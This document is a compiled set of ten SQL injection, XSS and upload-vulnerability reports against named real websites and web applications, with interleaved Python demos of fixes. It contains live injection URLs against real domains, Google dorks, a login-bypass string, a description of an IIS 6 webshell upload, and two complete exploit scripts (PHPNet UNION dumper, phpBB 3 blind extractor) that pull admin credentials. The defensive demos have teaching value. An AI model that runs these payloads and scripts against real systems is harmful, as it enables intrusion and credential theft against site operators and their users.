SQL injection in a Bambook channel, and fix (10 articles compiled), contributed by user "海昌漾洁"; the articles below were compiled by the editor for your reading.
Part 1: SQL injection in a Bambook channel, and fix
Brief description: Because of insufficient filtering, one Bambook channel has an SQL injection vulnerability.
Details: bbsdk.sdo.com/opus_detail.do?sid=e441a73c442b09562d26655d6d593369'%20and%201=2%20union%20select%201,2,3,@@version,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5--
The sid parameter is not filtered: a single quote closes the string, and 1=2 suppresses the real row, and a 25-column UNION places @@version in the fourth displayed column.
Proof: Microsoft SQL Server - 8.00.2040 (Intel X86) May 13 18:33:17 Copyright (c) 1988- Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
Fix: you know the drill (do not concatenate sid into the query; bind it as a parameter).
Part 2: SQL injection in a Shanghai Hotline channel, and fix
Brief description: SQL injection in a Shanghai Hotline (上海热线) channel
Details: train.online.sh.cn/Apply/applysubmit.aspx?classid=46760
is SQL-injectable, and the database connection runs as sa.
Because detailed remote error messages are disabled, the source was downloaded and analysed locally; the dangerous parameter is not filtered. With sa privileges the injection can be used directly to take over the server.
Proof of concept:
Fix: include a request-checking file and filter dangerous parameters.
Part 3: High-privilege SQL injection in a broadband video site, and fix
Cloud Vision (云视界), a sub-site of the leading domestic broadband video provider Zhonglu Broadband (中录宽频), has several injection points running as ROOT. One of them: cloud.zlvod.com/index.php?r=detail&id=24009. From there the cloud management backend can be entered and arbitrary files uploaded,
and several database servers can be reached by IP. (Note: no data was modified; the one-line webshell used for testing has been deleted.)
Fix:
Filter the parameters.
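Parts 1 to 3 all end with "filter the parameter", which is the weakest possible fix for the pattern they describe. The example below is added here and is not code from any of the sites above: it builds a throwaway SQLite table standing in for the "detail" page behind index.php?r=detail&id=... (table and column names are made up), shows the concatenated query being sized with ORDER BY and then read out with a padded UNION, exactly as the 25-column Bambook payload does, and beside it the typed, parameterized version that rejects the same input. Note that the numeric id needs no quote at all, so quote filtering would not have helped.

```python
import sqlite3

# Constructed stand-in for the article table behind index.php?r=detail&id=...
# (hypothetical names, not the real application's schema).
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO article VALUES (24009, 'a film', 'detail text');
        CREATE TABLE admin (id INTEGER PRIMARY KEY, name TEXT, pass TEXT);
        INSERT INTO admin VALUES (1, 'root', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return db

def detail_vulnerable(db, id_param):
    # The pattern every report above describes: the request parameter is pasted
    # into the statement. id is in a numeric context, so no quote is needed to
    # break out and "filtering quotes" changes nothing.
    sql = "SELECT id, title, body FROM article WHERE id=" + id_param
    return db.execute(sql).fetchall()

def detail_fixed(db, id_param):
    # Validate the type first, then bind the value: the engine receives it as
    # data and never parses it as SQL.
    if not id_param.isdigit():
        raise ValueError("id must be a positive integer")
    sql = "SELECT id, title, body FROM article WHERE id=?"
    return db.execute(sql, (int(id_param),)).fetchall()

def count_columns(db, page):
    """Size the SELECT the way an attacker does: raise ORDER BY n until the
    database complains that the column does not exist."""
    n = 1
    while True:
        try:
            page(db, f"24009 ORDER BY {n}")
        except sqlite3.OperationalError:
            return n - 1
        n += 1

def dump_admin_via_union(db, page):
    """UNION the admin row into the page output, padding to the discovered
    width with NULL (the Bambook payload pads with 1,2,3,... for the same reason)."""
    width = count_columns(db, page)
    cols = ["sqlite_version()", "name", "pass"] + ["NULL"] * (width - 3)
    payload = "0 UNION SELECT " + ",".join(cols) + " FROM admin"
    return page(db, payload)

if __name__ == "__main__":
    db = make_db()
    print(dump_admin_via_union(db, detail_vulnerable))   # version, admin name, hash
```

Run against detail_vulnerable the dump returns the engine version and the admin credentials in one row; run against detail_fixed the very first probe is rejected before any SQL is built.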
Part 4: XSS in a Sina channel, and fix
The search string is not processed or filtered effectively, which gives a reflected XSS.
che.sina.com.cn/apps/index.php?homo=off&mod=auto&act=sinaresult&type=search&query=">&service=cars
Paste it into a browser and open it. The "> in query closes the attribute the search term is echoed into, and any tag that follows it is rendered.
Pop-ups, iframes and the other usual cross-site attacks work directly.
Fix: encode the search string for the HTML context it is output into.
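"Filter the search string" is vague; what actually closes the hole is encoding the value for the context it is printed into. The example below is added here and is not Sina's code: it models a search page that echoes the query both inside an input attribute and as body text (the markup is invented), and shows html.escape with quote=True making the "> payload inert in both places. The tag count of the rendered page is the check a reviewer can apply: it must not depend on the input.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for the search result page (hypothetical markup).
def query_from_url(url):
    """Recover the query parameter as the server-side script would see it."""
    return parse_qs(urlsplit(url).query).get("query", [""])[0]

def render_vulnerable(query):
    # The search term is echoed twice, unencoded: once inside an attribute,
    # where "> closes the tag, and once as text, where < opens one.
    return (f'<input type="text" name="query" value="{query}">'
            f'<h2>Results for {query}</h2>')

def render_fixed(query):
    # Encode at output time for the HTML context. quote=True also encodes
    # " and ', which is what protects the attribute position.
    safe = html.escape(query, quote=True)
    return (f'<input type="text" name="query" value="{safe}">'
            f'<h2>Results for {safe}</h2>')

def tag_count(markup):
    """Number of tag openers in the page; constant for the fixed renderer."""
    return markup.count("<")

if __name__ == "__main__":
    q = query_from_url("http://che.sina.com.cn/apps/index.php?mod=auto&act=sinaresult"
                       "&type=search&query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E")
    print(render_vulnerable(q))
    print(render_fixed(q))
```

Where the value is later used in a JavaScript or URL context, HTML escaping is the wrong encoder; pick the one for that context instead of stacking filters on input.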
Part 5: SantriaCMS SQL injection flaw, fix, and advisory
# I Think, I can, But i'm just loser
Author: Troy
Program information
Vendor: www.jasawebsitemurah.info/cms/
Title: SantriaCMS SQL Injection Vulnerability
Tested on: LocalHost
Internet For Freedom
Proof of concept
www.badguest.cn/cms/
# www.badguest.cn/cms/view.php?idArtikel=[SQL]
Fix:
Filter the idArtikel parameter input on view.php.
Part 6: DmxReady Bilboard v1.2 SQL injection, and fix
# Exploit Title: DmxReady Bilboard v1.2 SQL Injection Vulnerability
# Google Dork: inurl:inc_billboardmanager_summary_popup.asp
# Date: 03.07.
# Author: Bellatrix
# Software Link: www.dmxready.com/?product=billboard-manager
# Version: v1.2
#Language: ASP
# Price : $99.97
# Tested on: Windows XP Sp3
# Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members....
----------------------------------------------------------------------------------------------------
Bug;
/path/admin/BillboardManager/update.asp?ItemID=xx [ SQL ATTACK]
fix: filter the ItemID parameter input on update.asp
Part 7: PHPNet <= 1.8 (ler.php) SQL injection, fix, and advisory
Title: PHPNet <= 1.8 (ler.php) SQL Injection
Author: WhiteCollarGroup
Vendor: www.phpnet.com.br/
Download: phpbrasil.com/script/Wb03ErMczAho/phpnetartigos
Affected version: 1.8
Tested on: Debian GNU/Linux, Windows 7 Ultimate
<?php
/*
Several SQL injections were found in this system.

~> SQL Injection
This exploit is for a vulnerability in ler.php, but the same vulnerability exists in imprimir.php and imagem.php.
ler.php?id=[SQLi]
imprimir.php?id=[SQLi]
imagem.php?id=[SQLi]
Example:
php file.php www.xxx.com/path/

~> Login bypass
On the login page you can bypass the login using "SQLi strings".
Go to www.xxx.com/path/admin/login.php
Login: ' or 1=1-- wc
Pass: wcgroup

~> Arbitrary file upload
After opening the administration panel, try to add a new article.
Use the upload form to upload your webshell.
After posting, access:
server/path/tmp/your_shell_filename.php

~> Information disclosure
Access:
server/path/conf/config.ini

~> XSS Stored (persistent)
When posting a new article, you can post (D)HTML/JavaScript code on the page.
*/
function _printf($str) {
    echo $str."\n";
}
// encode a string as a 0x... literal so it can be placed in the query without quotes
function hex($string){
    $hex=''; // PHP 'Dim' =]
    for ($i=0; $i < strlen($string); $i++){
        $hex .= dechex(ord($string[$i]));
    }
    return '0x'.$hex;
}
set_time_limit(0);
error_reporting(E_ERROR | E_USER_WARNING);
@ini_set('default_socket_timeout', 30);
echo "\n";
echo "PHPNet <= 1.8 SQLi Exploit\n";
echo "Discovered by WhiteCollarGroup\n";
echo "www.wcgroup.host56.com - whitecollar_group@hotmail.com\n";
if($argc!=2) {
    _printf("Usage:");
    _printf("php $argv[0] <target>");
    _printf("Example:");
    _printf("php $argv[0] www.xxx.com/path/");
    exit;
}
$target = $argv[1];
if(substr($target, (strlen($target)-1))!="/") { // if the last character is not a slash, add one
    $target .= "/";
}
if(!preg_match('#^https?://#i', $target)) {     // file_get_contents() needs a URL scheme
    $target = "http://".$target;
}
$inject = $target . "ler.php?id=-0'%20";
$token = uniqid();                  // random marker used to cut the data out of the HTML
$token_hex = hex($token);
// first fetch version() and user()
echo "\n\n[*] Trying to get informations...\n";
$infos = file_get_contents($inject.urlencode("union all select 1,2,3,4,concat(".$token_hex.",version(),".$token_hex.",user(),".$token_hex."),6,7,8-- "));
$infos_r = array();
preg_match_all("/$token(.*)$token(.*)$token/", $infos, $infos_r);
$version = $infos_r[1][0] ?? '';    // concat() order above: version first, then user
$user = $infos_r[2][0] ?? '';
if(($user) AND ($version))
{
    echo "[!] MySQL user: $user\n";
    echo "[!] MySQL version: $version\n";
}
else
{
    echo "[-] Error while getting informations...\n";
}
// then dump pna_admin one row per request with LIMIT $i,1
$i = 0;
while(1==1) {
    $dados_r = array();
    $dados = file_get_contents($inject.urlencode("union all select 1,2,3,4,concat(".$token_hex.",admin_user,".$token_hex.",admin_pass,".$token_hex."),6,7,8 from pna_admin limit $i,1-- "));
    preg_match_all("/$token(.*)$token(.*)$token/", $dados, $dados_r);
    $login = $dados_r[1][0] ?? '';
    $senha = $dados_r[2][0] ?? '';
    if(($login) AND ($senha)) {
        echo " -+-\n";
        echo "[!] User: $login\n";
        echo "[!] Pass: $senha\n";
        $i++;
    } else {
        break; // exit loop
    }
}
if($i==0) {
    echo "[-] Exploit failed. Make sure that's server is using a valid version of PHPNet without mod_security. We're sorry.";
} else {
    echo " -+-\n[!] :D";
}
echo "\n";
?>
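The login bypass in the advisory above (Login: ' or 1=1-- wc, any password) is a different injection context from the ler.php id: the value lands inside a quoted string in the WHERE clause and turns it into a tautology. The example below is added here and is not PHPNet's code; it uses the pna_admin table name from the exploit but a made-up row, assumes md5 storage purely so the demo table has something to compare (not a claim about PHPNet), and shows the concatenated login beside one that binds the username and compares the hash in constant time.

```python
import hashlib
import hmac
import sqlite3

# Constructed stand-in for the admin table (table name from the exploit above,
# the row and the md5 storage are assumptions made for this demo).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pna_admin (admin_user TEXT, admin_pass TEXT)")
    db.execute("INSERT INTO pna_admin VALUES (?, ?)",
               ("admin", hashlib.md5(b"correct-horse").hexdigest()))
    return db

def login_vulnerable(db, user, password):
    # Both fields are spliced into the WHERE clause. With user = "' or 1=1-- wc"
    # it reads: ... WHERE admin_user='' or 1=1-- wc' AND admin_pass='...'
    # Everything after -- is a comment, so the first admin row is returned.
    digest = hashlib.md5(password.encode()).hexdigest()
    sql = (f"SELECT admin_user FROM pna_admin "
           f"WHERE admin_user='{user}' AND admin_pass='{digest}'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_fixed(db, user, password):
    # Bind the username (the quote in the payload is now just a character in a
    # name that does not exist), then compare the stored hash in constant time.
    row = db.execute("SELECT admin_user, admin_pass FROM pna_admin WHERE admin_user=?",
                     (user,)).fetchone()
    if row is None:
        return None
    digest = hashlib.md5(password.encode()).hexdigest()  # md5 only to mirror the demo table
    return row[0] if hmac.compare_digest(row[1], digest) else None

if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "' or 1=1-- wc", "wcgroup"))  # admin
    print(login_fixed(db, "' or 1=1-- wc", "wcgroup"))       # None
```

The bound query is the fix for the injection; the md5 in the demo is not a recommendation for password storage, which should use a slow salted hash such as bcrypt or argon2.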
Part 8: GIMS graduate management system SQL injection and upload vulnerability (with fix)
1. SQL injection, no login required:
/gmis/xkjsb/dskyinfo/dskyInfoBs1.aspx?id=1
2. Upload through the IIS parsing flaw:
Supervisor photos are stored as <supervisor code>.jpg.
Change the value of the supervisor-code element on the page to 1.asp;1 and click re-upload; the result is a webshell at
XXXX.edu.cn/gmis/dsphoto/1.asp;1.jpg
(IIS 6 stops parsing the path at the ";" and hands the file to the ASP handler.)
Author: Dreama
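The upload bug above is not a filtering problem in the photo itself: the stored name is built from a client-controlled field, and IIS 6 decides the handler from the part of the name before the ";". The example below is added here and is not GIMS code (the function and the digits-only code format are assumptions). It derives the stored name from a validated supervisor code, whitelists and sniffs the content as JPEG, and ignores the client's filename entirely, so neither 1.asp;1 as a code nor shell.asp;x.jpg as a filename can produce an executable path.

```python
import os
import re

# Constructed hardening for the supervisor-photo upload (hypothetical; the real
# GIMS handler is not shown on the page). Photos are stored as <code>.jpg.
SUPERVISOR_CODE = re.compile(r"[0-9]{1,10}")   # assumed format: digits only
JPEG_MAGIC = b"\xff\xd8\xff"

def stored_photo_name(supervisor_code, client_filename, data):
    """Return the server-side name the upload is stored under, or raise ValueError."""
    # 1. The stored name comes from a validated code, never from free text.
    #    "1.asp;1" fails here, so no path like /dsphoto/1.asp;1.jpg is ever
    #    created for IIS 6 to truncate at ';' and run as ASP.
    if not SUPERVISOR_CODE.fullmatch(supervisor_code):
        raise ValueError("invalid supervisor code")
    # 2. Whitelist the client's extension (only the last one counts) ...
    ext = os.path.splitext(os.path.basename(client_filename))[1].lower()
    if ext not in (".jpg", ".jpeg"):
        raise ValueError("unsupported file type")
    # 3. ... and require the bytes to actually be a JPEG, so a script renamed
    #    to .jpg is refused even before any handler question arises.
    if not data.startswith(JPEG_MAGIC):
        raise ValueError("content is not a JPEG")
    # 4. Store under the derived name, in a directory with script execution off.
    return supervisor_code + ".jpg"

if __name__ == "__main__":
    print(stored_photo_name("1", "me.jpg", JPEG_MAGIC + b"\xe0" + b"\x00" * 16))  # 1.jpg
```

The client filename is only consulted for the extension whitelist; the name on disk never contains it, which is what makes the ";" trick irrelevant regardless of the web server version.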
Part 9: Sheffield SQL injection flaw, and fix
#########################################################
# Title : Sheffield SQL Injection Vulnerability
# Author: Kalashinkov3
# Home : 13000 / ALGERIA
# Website : 1337day.com / dis9.com
# Vendor: www.resounddesign.co.uk
# Email : kalashinkov3[at]Hotmail[dot]Fr
# Date : 26/06/
# Google Dork : intext:"Site by Resound Design Web Design Sheffield"
# Category : Webapps
#########################################################
[+] Exploit :)
# /article.php?id=1
# /article.php?id=[SQLi]
# /shop.php?id=1
# /shop.php?id=[SQLi]
# /*.php?id=1
# /*.php?id=[SQLi]
[+] Login Admin :
# /admin
^_^ G00d LUCK ALL :=)
Fix: filter the parameter input on the affected pages
+ Greets To==================================================================+
+
BrOx-dz, KedAns-Dz, Caddy-Dz, KnocKout, toxic-kim, [Lila Far=>D], Keinji1258 +
ALLA Foundou,586, 1337day.com, packetstormsecurity.org, Exploit-id.com +
andhrahackers.com, 1337day.com/team, id-backtrack.com, dis9.com/team +
# all Algerians HackerS ;), All My Friends # +
<3 I Love You Lila <3
Part 10: phpBB 3.0 SQL injection
Source: www.kanwi.cn
#!/usr/bin/php -q -d short_open_tag=on
<?php
echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure\r\n";
echo "by rgod rgod@autistici.org\r\n";
echo "site: retrogod.altervista.org\r\n";
echo "dork, version specific: \"Powered by phpBB * 2002, 2006 phpBB Group\"\r\n\r\n";
/*
works regardless of php.ini settings
you need a global moderator account with "simple moderator" role
*/
if ($argc<5) {
  echo "Usage: php ".$argv[0]." host path user pass OPTIONS\r\n";
  echo "host:      target server (ip/hostname)\r\n";
  echo "path:      path to phpbb3\r\n";
  echo "user/pass: u need a valid user account with global moderator rights\r\n";
  echo "Options:\r\n";
  echo "   -T[prefix]:  specify a table prefix different from default (phpbb_)\r\n";
  echo "   -p[port]:    specify a port other than 80\r\n";
  echo "   -P[ip:port]: specify a proxy\r\n";
  echo "   -u[number]:  specify a user id other than 2 (admin)\r\n";
  echo "   -x:          disclose table prefix through error messages\r\n";
  echo "Example:\r\n";
  echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u\r\n";
  echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7\r\n";
  die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

// debug helper: hex and printable dump of a string, 15 bytes per row
function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
    if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
    {$result.=" .";}
    else
    {$result.=" ".$string[$i];}
    if (strlen(dechex(ord($string[$i])))==2)
    {$exa.=" ".dechex(ord($string[$i]));}
    else
    {$exa.=" 0".dechex(ord($string[$i]));}
    $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
  return $exa."\r\n".$result;
}

$proxy_regex = '/(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{1,5})/';

// send one raw HTTP request, directly or through the -P proxy; the response lands in $html
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
    $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
    }
  }
  fputs($ock,$packet);
  $html='';
  if ($proxy=='') {
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    // byte by byte, until EOF and the end of the headers have both been seen
    while ((!feof($ock)) or (strpos($html,"\r\n\r\n")===false)) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}

$host=$argv[1];
$path=$argv[2];
$user=$argv[3];
$pass=$argv[4];
$port=80;
$prefix="PHPBB_";
$user_id="2";//admin
$discl=0;
$proxy="";
for ($i=5; $i<=$argc-1; $i++){   // options come after the four positional arguments
  $temp=$argv[$i][0].$argv[$i][1];
  if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); }
  if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); }
  if ($temp=="-T") { $prefix=str_replace("-T","",$argv[$i]); }
  if ($temp=="-u") { $user_id=str_replace("-u","",$argv[$i]); }
  if ($temp=="-x") { $discl=1; }
}
if (($path[0]!='/') or ($path[strlen($path)-1]!='/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}   // absolute URI through a proxy

// step 1: log in as the moderator and collect the session cookies
$data="username=".urlencode($user);
$data.="&password=".urlencode($pass);
$data.="&redirect=index.php";
$data.="&login=Login";
$packet="POST ".$p."ucp.php?mode=login HTTP/1.0\r\n";
$packet.="Referer: $host$path/ucp.php?mode=login\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$cookie="";
$temp=explode("Set-Cookie: ",$html);
for ($i=1; $i<=count($temp)-1; $i++)
{
  $temp2=explode(" ",$temp[$i]);
  $cookie.=" ".$temp2[0];
}
if (preg_match("/_u=1;/i",$cookie))   // still the anonymous user id: login did not work
{
  //echo $html."\r\n";//debug
  //die("Unable to login...");
}
echo "cookie -> ".$cookie."\r\n";

// send one memberlist.php "search by ip" request with $sql in the ip field;
// the response lands in the global $html (set by sendpacketii)
function ip_search($sql)
{
  global $p, $host, $cookie;
  echo "sql -> ".$sql."\r\n";
  $sql=urlencode(strtoupper($sql));
  $data="username=";
  $data.="&icq=";
  $data.="&email=";
  $data.="&aim=";
  $data.="&joined_select=lt";
  $data.="&joined=";
  $data.="&yahoo=";
  $data.="&active_select=lt";
  $data.="&active=";
  $data.="&msn=";
  $data.="&count_select=eq";
  $data.="&count=";
  $data.="&jabber=";
  $data.="&sk=c";
  $data.="&sd=a";
  $data.="&ip=".$sql;
  $data.="&search_group_id=0";
  $data.="&submit=Search";
  $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
  $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Content-Length: ".strlen($data)."\r\n";
  $packet.="Connection: Close\r\n";
  $packet.="Cookie: ".$cookie."\r\n\r\n";
  $packet.=$data;
  sendpacketii($packet);
}

if ($discl)
{
  // step 2 (optional, -x): provoke a MySQL syntax error and read the table prefix out of it
  ip_search("'suntzuuuuu");
  if (strstr($html,"You have an error in your SQL syntax"))
  {
    $temp=explode("posts",$html);
    $temp2=explode(" ",$temp[0]);
    $prefix=strtoupper($temp2[count($temp2)-1]);
    echo "prefix -> ".$prefix."\r\n";sleep(2);
  }
}

// step 3: boolean-based blind extraction, one byte per request. The injected UNION
// yields $user_id when the guessed byte is right (so that user is listed in the
// results) and -1 otherwise (so the page says "No members found ...").
function blind_extract($column, $alphabet, $label)
{
  global $prefix, $user_id, $html;
  $j=1;$value="";
  while (!strstr($value,chr(0)))   // ASCII(SUBSTRING(...)) is 0 past the end of the string
  {
    for ($i=0; $i<=255; $i++)
    {
      if (!in_array($i,$alphabet)) continue;
      $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(".$column.",".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
      ip_search($sql);
      if (!strstr($html,"No members found for this search criteria")) {$value.=chr($i);echo $label." -> ".$value."[???]\r\n";sleep(2);break;}
    }
    if ($i>255) {die("Exploit failed...");}   // the loop ran out of candidates without a match
    $j++;
  }
  return $value;
}

$md5s=array_merge(array(0),range(48,57),range(97,102)); // NUL terminator, '0'-'9', 'a'-'f'
$password=blind_extract("USER_PASSWORD",$md5s,"password");
$admin=blind_extract("USERNAME",range(0,255),"admin");

echo "--------------------------------------------------------------------\r\n";
echo "admin -> ".$admin."\r\n";
echo "password (md5) -> ".$password."\r\n";
echo "--------------------------------------------------------------------\r\n";
function is_hash($hash)
{
  return preg_match("/^[a-f0-9]{32}/",trim($hash)) ? true : false;
}
if (is_hash($password)) {echo "Exploit succeeded...";}
else {echo "Exploit failed...";}
?>
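The phpBB exploit above never sees a query result; its only signal is whether the members list says "No members found", and it turns that one bit into the admin's password hash by asking about one byte at a time. The example below is added here and is not rgod's code or phpBB's: it rebuilds the two tables the exploit touches in SQLite (real phpBB column names, made-up rows, an md5 hash only so the exploit's 16-symbol alphabet applies), models the IP search as a true/false oracle with the value spliced into IN('...'), and runs the same extraction loop against it. SQLite's CASE WHEN, unicode() and substr() stand in for MySQL's IF, ASCII and SUBSTRING, and ifnull(...,0) reproduces MySQL's ASCII('')=0 end-of-string marker. The same loop run against the parameterized search fails on the first position, which is the check that the fix actually closes the oracle.

```python
import hashlib
import sqlite3

PREFIX = "phpbb_"
ADMIN_HASH = hashlib.md5(b"suntzu").hexdigest()   # made-up credential for the demo

# Constructed miniature of the tables the exploit queries (rows are invented).
def make_forum():
    db = sqlite3.connect(":memory:")
    db.executescript(f"""
        CREATE TABLE {PREFIX}users (user_id INTEGER, username TEXT, user_password TEXT);
        INSERT INTO {PREFIX}users VALUES (2, 'admin', '{ADMIN_HASH}');
        CREATE TABLE {PREFIX}posts (poster_id INTEGER, poster_ip TEXT);
        INSERT INTO {PREFIX}posts VALUES (2, '10.0.0.1');
    """)
    return db

def _page_lists_members(db, poster_ids):
    """Second half of the search page: list users whose id posted from that ip."""
    if not poster_ids:
        return False
    marks = ",".join("?" * len(poster_ids))
    row = db.execute(f"SELECT 1 FROM {PREFIX}users WHERE user_id IN ({marks})", poster_ids).fetchone()
    return row is not None

def members_found_vulnerable(db, ip):
    """Oracle modelled on the injectable search: ip is spliced into IN('...').
    True when the page would NOT say "No members found"."""
    rows = db.execute(f"SELECT poster_id FROM {PREFIX}posts WHERE poster_ip IN ('{ip}')").fetchall()
    return _page_lists_members(db, [r[0] for r in rows])

def members_found_fixed(db, ip):
    """Same search with ip bound as a parameter: the payload is just an ip that matches nothing."""
    rows = db.execute(f"SELECT poster_id FROM {PREFIX}posts WHERE poster_ip IN (?)", (ip,)).fetchall()
    return _page_lists_members(db, [r[0] for r in rows])

MD5_ALPHABET = [0] + list(range(48, 58)) + list(range(97, 103))   # NUL, '0'-'9', 'a'-'f'

def blind_extract(oracle, column, alphabet, user_id=2):
    """Recover users.<column> of user_id one character per oracle call, as the
    exploit does. Returns (value, number_of_requests)."""
    value, pos, queries = "", 1, 0
    while True:
        for c in alphabet:
            payload = (f"1.1.1.999') UNION SELECT CASE WHEN "
                       f"ifnull(unicode(substr({column},{pos},1)),0)={c} THEN {user_id} ELSE -1 END "
                       f"FROM {PREFIX}users WHERE user_id={user_id} "
                       f"UNION SELECT poster_id FROM {PREFIX}posts WHERE poster_ip IN ('1.1.1.999")
            queries += 1
            if oracle(payload):
                break
        else:
            raise RuntimeError("no symbol matched: wrong alphabet, or the search is not injectable")
        if c == 0:                      # past the end of the string
            return value, queries
        value += chr(c)
        pos += 1

if __name__ == "__main__":
    db = make_forum()
    print(blind_extract(lambda p: members_found_vulnerable(db, p), "user_password", MD5_ALPHABET))
    print(blind_extract(lambda p: members_found_vulnerable(db, p), "username", list(range(128))))
```

Each character costs at most one request per alphabet symbol, so a 32-character md5 takes at most 32 times 17 requests plus one for the terminator; a binary search on the byte value would cut that to about 8 per character, which is what a detection rule watching for bursts of near-identical memberlist.php searches should expect.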